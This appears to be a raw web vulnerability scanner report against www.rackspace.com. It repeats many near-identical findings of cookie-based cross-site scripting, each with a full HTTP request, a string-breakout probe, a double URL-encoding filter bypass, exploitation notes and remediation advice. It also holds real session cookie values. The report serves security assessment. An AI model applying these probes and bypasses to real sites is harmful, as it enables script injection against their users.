GET /apps/contact_us HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8e1c38%2527%253b969c1228a5; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d28cd%2527%253bf981a7d0214 was submitted in the IS_UASrackuid cookie. This input was echoed as d28cd';f981a7d0214 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/contact_us/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d28cd%2527%253bf981a7d0214; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54a33%2527%253bb5a29e6008c was submitted in the IS_UASrackuid cookie. This input was echoed as 54a33';b5a29e6008c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/contact_us/email_sales/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f854a33%2527%253bb5a29e6008c; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecd0%2527%253b50e5dee99ec was submitted in the IS_UASrackuid cookie. This input was echoed as 6ecd0';50e5dee99ec in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/control_panel/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f86ecd0%2527%253b50e5dee99ec; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f765%2527%253b2a9ccb461b8 was submitted in the IS_UASrackuid cookie. This input was echoed as 9f765';2a9ccb461b8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/customers HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f89f765%2527%253b2a9ccb461b8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5722%2527%253bd5922c2264e was submitted in the IS_UASrackuid cookie. This input was echoed as c5722';d5922c2264e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/customers/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c5722%2527%253bd5922c2264e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b91a9%2527%253b1e14116bc6d was submitted in the IS_UASrackuid cookie. This input was echoed as b91a9';1e14116bc6d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8b91a9%2527%253b1e14116bc6d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfdb5%2527%253b93bf3f5231a was submitted in the IS_UASrackuid cookie. This input was echoed as dfdb5';93bf3f5231a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/compare HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8dfdb5%2527%253b93bf3f5231a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f083%2527%253b14eea8ff837 was submitted in the IS_UASrackuid cookie. This input was echoed as 9f083';14eea8ff837 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/compare/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f89f083%2527%253b14eea8ff837; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6abc2%2527%253be5cc790193a was submitted in the IS_UASrackuid cookie. This input was echoed as 6abc2';e5cc790193a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/email_archiving/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f86abc2%2527%253be5cc790193a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1191%2527%253b6ce7163e15a was submitted in the IS_UASrackuid cookie. This input was echoed as f1191';6ce7163e15a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/exchange_hosting HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8f1191%2527%253b6ce7163e15a; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bad4f%2527%253bb865cd9355d was submitted in the IS_UASrackuid cookie. This input was echoed as bad4f';b865cd9355d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
